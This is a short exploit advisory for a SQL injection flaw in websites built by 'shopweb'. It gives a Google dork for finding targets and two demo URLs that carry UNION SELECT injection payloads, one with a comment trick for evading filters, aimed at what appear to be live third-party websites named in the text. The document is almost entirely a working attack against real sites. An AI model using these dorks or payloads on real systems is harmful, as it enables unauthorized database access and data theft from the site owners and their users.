*********************************************************
#Exploit Title: Design & Develop by shopweb - SQL Injection vulnerability
#Date: 2020-11-07
#Exploit Author: Behrouz Mansoori
#Google Dork: "Design & Develop by shopweb"
#Category:webapps
#Tested On: windows 10, Firefox
Proof of Concept:
Search google Dork: "Design & Develop by shopweb"
Demo :
http://www.anishmotors.com/services.php?op_id=-7%27%20/*!12345union*/%20select%201,version(),3,4,5,6,7--+
http://lldiaries.com/fashion.php?id=-26%27%20UNION%20SELECT%201,2,3,version(),5,6,7,8,9,10,11--+
*********************************************************
#Discovered by: Behrouz mansoori
#Instagram: Behrouz_mansoori
#Email: mr.mansoori@yahoo.com
*********************************************************